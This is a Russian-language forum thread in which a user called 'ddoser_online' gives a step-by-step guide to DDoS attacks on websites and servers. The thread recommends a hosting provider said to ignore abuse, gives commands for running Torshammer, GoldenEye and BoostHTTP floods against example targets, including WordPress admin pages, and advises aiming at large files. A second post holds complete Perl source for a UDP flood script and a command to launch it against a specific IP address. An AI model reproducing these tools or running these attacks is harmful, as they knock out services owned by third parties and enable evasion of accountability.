В теме одно сообщение

[ddoser_online]

И так здравствуйте. Сегодня я раскрою миф о Layer7 ддос атаках, http протокола. Есть атаки с ботнетов а есть  с серверов со спуфом.
Что такое спуф? Это когда 1 сервер отсылает запросы с направлением на удаленный веб-сервер (не факт что веб) через определенное количество прокси серверов, которые отсылают уже забрасывают пакеты на конечную точку (сервер который вы атакуете) полуоткрытыми соединения "tcp-syn атаки".
На самом деле что бы положить сайт никакой мощности и не требуется, просто знания выявления уязвимостей и правильность использования протоколов и приложения веб-сервера (Apache2, NGINX).
Для того что бы атаковать без-палевно, возьмите за 350 рублей сервер VPS с хорошей сетью. Советую брать тут, ибо им глубоко наплевать чем вы занимаетесь на сервере. https://cp.inferno.n...cart.php?gid=48
Нет нет - это не пиар хостинга, они всем ддосерам известны как торговцы и реселлеры серверов. Для начала VPS за 5$ вам в полне должно хватить, можете воспользоваться VPS серверами с тестовым периодом, но я советую брать сразу такой.

Далее укажите в запросе что бы вам поставили ОС Debian или Ubuntu. После получения доступов к серверу - скачиваем PUTTY (программа для удаленного управления Linux серверов)

Вписываете ИП, логин - root и пароль который вам выслали на почту.

перед вами черный терминал: и так приступим!

вписываем команды:

apt-get update
apt-get install python python3
pip install python-lib
apt-get install perl
apt-get upgrade

Далее скачиваем мой архив со скриптами https://yadi.sk/d/k4jsFoqF3NwZx2, в нем 3 скрипта под Layer7 атаки на вебсерверы методами get/post/head/
Рассмотрим первый ( Torshammer )
распаковываем все архивы в папке root и в терминале прописываем

chmod -R 777 /root

И кстати что бы залить архив и распаковать его - надо воспользоваться программой Filezilla или Winscp - так же вписывайте IP+ root + пароль.

далее команды :

apt-get install unzip
unzip ddos_tools.zip

После того как мы выдали права на root папку, заходим в папку torshammer :

cd /root/torshammer

запускаем атаку на сайт который хотите атаковать :

./torshammer.py www.example.com -r 400

Этот скрипт вызывает полуоткрытые tcp соединения с 1 и тогоже ип адреса вашего сервера, соединение несет низкий ttl так что эту атаку многие легко смогут заблокировать если додумаются.

Вторая атака (GET/POST методы)

cd /GoldenEye
./goldeneye.py http://www.example.com/ -w 50 -s 5000 -m get -d

Так же можем атаковать POST методом например по PHP скриптам сайта ( регистрации аккаунтов) или по WordPress

./goldeneye.py http://91.134.200.189/register.php/ -w 50 -s 600 -m post
./goldeneye.py http://91.134.200.189/wp-admin/ -w 50 -s 600 -m post

http://91.134.200.189/ и www.example.com - это пример сайтов которые мы атакуем как и по домену так и по IP адресу.

А теперь самая сильная атака из всех что я знаю для атаки сайтов под спуфы BoostHTTP

Она используется на 99% стрессорах и вызывает разрушительные ошибки приложения веб-серверов IIS, Apache2 и даже NGINX! Спуф атака про которую я говорил, равносильна атаке с ботнета в зависимости от количества ИП адесов в списке файла proxy.txt

cd /boosthttp
python BoosTHTTPv3.0.py

и следуйте примеру - укажите адрес и порт.
Так же я добавил свежие прокси листы для спуфа. Можете закупаться прокси листами, результатом вы останетесь довольнына все 100%.

Эти методы на 100% рабочие, все зависит от ваших рук и сайтов,также эти скрипты с открытым кодом и вы можете менять методы атак и структуры отправки пакетов на атакуемый сервер.
Еще хотел подметить что если запускать атаку по файлам большего размера чем главная страница сайта index, например на сайте есть тяжелое видео или картинка или архив,то атака будет в 2-10 раз производительнее. Ведь 95% хостеров даже не знают как защищать сеть от http флуда.

Удачи всем кто хочет изучать сеть , для тех кто хочет защищать веб серверы, я создам отдельную тему если вам понравилось.

Сообщение отредактировал ddoser_online: 20 October 2017 - 23:58

[ddoser_online]

Добавлен скрипт UDP атаки: надеюсь за открытый код администрация не удалит мой комментарий :
Создайте файл в  Notepad ++ и в ставьте туда код :

##############
# udp flood.
##############

use Socket;
use strict;

if ($#ARGV != 3) {
print " \n";
print "Super DDoS // by Adrien\n\n";
print "Commande: flood.pl <ip> <port> <packets> <temps(en secondes)>\n";
print " port: le port à flood. Mettez 0 pour tous.\n";
print " packets: le nombre de packets à envoyer. Entre 64 et 1024.\n";
print " temps: le temps de flood en secondes.\n";
exit(1);
}

my ($ip,$port,$size,$time) = @ARGV;

my ($iaddr,$endtime,$psize,$pport);

$iaddr = inet_aton("$ip") or die "Impossible de se connecter à $ip\n";
$endtime = time() + ($time ? $time : 1000000);

socket(flood, PF_INET, SOCK_DGRAM, 17);

print "Flooding en cours sur $ip avec le port " . ($port ? $port : "random") . ", envoit de " .
($size ? "$size-byte" : "random size") . " packets" .
($time ? " pour $time secondes" : "") . "\n";
print "Attaque arrêtée avec Ctrl-C\n" unless $time;

for (;time() <= $endtime;) {
$psize = $size ? $size : int(rand(1500-64)+64) ;
$pport = $port ? $port : int(rand(65500))+1;

send(flood, pack("a$psize","flood"), 0, pack_sockaddr_in($pport, $iaddr));}

Сохраните как ddos.pl
На стороне сервера выдайте права на скрипт

chmod -R 777 ddos.pro

И запустите атаку на нужный вам сервер :

perl ddos.pl 50.62.88.95 80 1000 3600

50.62.88.95 - это IP сервера который вы атакуете (замените его на нужный вам IP), 80 это порт, 1000 размер пакета, 3600 - время в секундах (1 час). Все значения вы можете заменять.
Что бы прекратить любую атаку с вашего сервера достаточно нажать ctrl + c

Если вам понравилось, могу снять подробный видеогайд.

Сообщение отредактировал ddoser_online: 21 October 2017 - 14:01